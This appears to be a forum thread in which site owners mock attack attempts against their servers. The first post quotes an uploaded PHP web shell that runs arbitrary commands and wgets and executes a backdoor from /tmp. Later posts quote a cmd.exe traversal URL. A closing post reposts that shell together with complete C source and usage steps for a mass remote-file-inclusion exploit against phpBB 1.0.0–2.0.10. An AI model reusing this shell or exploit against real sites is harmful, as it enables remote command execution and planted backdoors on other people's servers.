1'm b4b0, w4tch m3 hax0r



  • From David ...

    I have a form on my web page which allows users to upload files to it (wolever.net/Uploads), and I frequently get people uploading files like exploit.php, which are promptly piped to /dev/null.  Of corse, there are a few people who try uploading exploit.html and hoping its parsed as PHP (which, of corse, its not) and I have had a couple of attempts to over write mod_autoindex with custom index.html files... also failures.  This is one script I found particularly interesting thou...

    <FONT color=#0000ff>[b4b0.html]</FONT>
    <FONT face="Courier New">b4b0 kickin ass again.......
    System was exploited telnet to the port you have your backdoor set to listen on.
    <?
     if (isset($chdir)) @chdir($chdir);
      ob_start();
      system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
       system("cd /tmp; wget url_to_backdoor;chmod +x gota1;./gota1"); // EDIT THIS INFO!!!!!!!!!!!!!
       $output = ob_get_contents();:
      ob_end_clean();
      if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    ?>
    </FONT><FONT color=#0000ff>[/b4b0.html]</FONT>

    Note the line which says EDIT THIS INFO.



  • That's great .... quite a hacker! 



  • People seem to thinks that this URL will work to hack my apache on a Linux box...

    /scripts/..%255c%255c../winnt/system32/cmd.exe

    hmm yeah right.

    Also they try the Too Long URL exploit that works on old versions of IIS... LOL

    Drak



  • @Drak said:

    People seem to thinks that this URL will work to
    hack my apache on a Linux box...
    Those are just scripted worm
    attacks so they are just "trying their luck".



  • L053r5 is what they are [:P]

    Almost all are probably kiddies on the same provider as I am anyway.

     

    Drak



  • Also, it is possible with many web services (www, smtp, whatever) to
    put whatever "banner" string they want for incoming connections. 
    So therefore, people have IIS installs saying they are apache, and vice
    versa.  As a result of this, port scanners and script kiddie tools
    generally have options to ignore host banners and attempt all known
    exploits of ANY provider on that port.




  • As far as server logs go, I used to look at my apache log with
    amusement, seeing many entries like the one mentioned above.  I'm
    pretty confident in my apache install, so I really don't even look at
    that file anymore...



    The other entertaining log is the SSH connection log.  On a daily
    basis, 1 or more people using spoofed IP addresses attempt to log in
    with a static set of about 20 usernames and passwords.  Same 20
    every time.  It has to be part of some script kiddie toolkit or
    something, since I can't imagine the same person trying the same
    combination every day to see if maybe I finally DID create a user named
    "admin" with a password of  "password".  This has been
    ongoing for over a year.






  • I love this guy: http://www.gulftech.org/tools/base64.pl

    Not only is he referring to Base64 "Encryption", he also logs everyones conversions into a file in /tools/. Some of the things people are "Encrypting" are pretty funny ;)



  • Actually, Blue, I didn't take the lines from my log file. It's number 20 of the 20 most often requested non-existant pages in my statistics. [:D]

    I remember killing off my FTP server because 2 people were doing a hack attempt using things like 'administrator,system' etc as username and password. I reported their IP to their ISP and the got an official warning. If they ever do it again their connection will be terminated. Muhahaha. That'll teach them.

    Drak



  • You're lucky in that regard - my script kiddies spoof their IP address, so I have no idea who to complain to...



    About 6 months ago, I saw some that did appear to reverse-map, and did
    complain.  Never got a single response from any of the ISPs I
    contacted.  (none were major ISPs)






  • In my case it probably helped having th emost expensive non-business subscription for my ISP.

    Hey any clue to find out from the apache logs where all the hits to an image that I USED to have, but no longer have, are coming from? I think someone has used it on a forum as an avatar, but I cannot seem to find it on any of the referring pages that I can see in the statistics.

    Drak



  • I don't know of any tool that does it, but if you know the image
    filename, it should be quite easy.  Do an egrep using a regular
    expression that either includes all lines with that image filename, or
    to be more specific, lines with that image filename and a 404 result.



    HTH




  • Hello,

    Here is what it actually is from b4b0-phpBB.tgz This is a phpBB cashmod exploit. You also might wanna do some research on bahbo be for you start jumping to conclusions.. Who ever attempted to use this on you was a moron and should not be allowed to use a computer....

    Cheers,

    evilrabbi

    /* b4b0.php */

     

    <FONT size=2>

    b4b0 kickin ass again.......

    System was exploited telnet to the port you have your backdoor set to listen on.

    <?

    if (isset($chdir)) @chdir($chdir);

    ob_start();

    system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

    system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!!

    $output = ob_get_contents();

    ob_end_clean();

    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));

    ?>

    /* code for mass exploitation */

    <FONT size=2>

    /*

    exploit for phpBB 1.0.0 - 2.0.10

    edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to

    a webserver.

    gcc -o b4b0-phpbb b4b0-phpbb.c

    ./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php>

    telnet <url_of_exploited_system> <port_of_back_door>

    greets to b4b0

    -- evilrabbi

    */

    #include <stdio.h>

    #include <string.h>

    #include <netdb.h>

    #include <sys/types.h>

    #include <sys/socket.h>

    #include <netinet/in.h>

    void help(char *program_name);

    int main(int argc, char *argv[]) {

    struct sockaddr_in trg;

    struct hostent *he;

    int sockfd, buff;

    char buffer[1024];

    char *request;

    if(argc != 4 ) {

    help(argv[0]);

    exit(0);

    }

    he = gethostbyname(argv[1]);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    request = (char *) malloc(1024);

    trg.sin_family = AF_INET;

    trg.sin_port = htons(80);

    trg.sin_addr = *((struct in_addr *) he->h_addr);

    memset(&(trg.sin_zero), '\0', 8);

    connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr));

    sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]);

    send(sockfd,request,strlen(request),0);

    buff=recv(sockfd, buffer, 1024-1, 0);

    buffer[buff] = '\0';

    printf("%s",buffer);

    close(sockfd);

    return 0;

    }

    void help(char *program_name) {

    printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n");

    printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name);

    printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name);

    }

    </FONT>
    </FONT>

Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.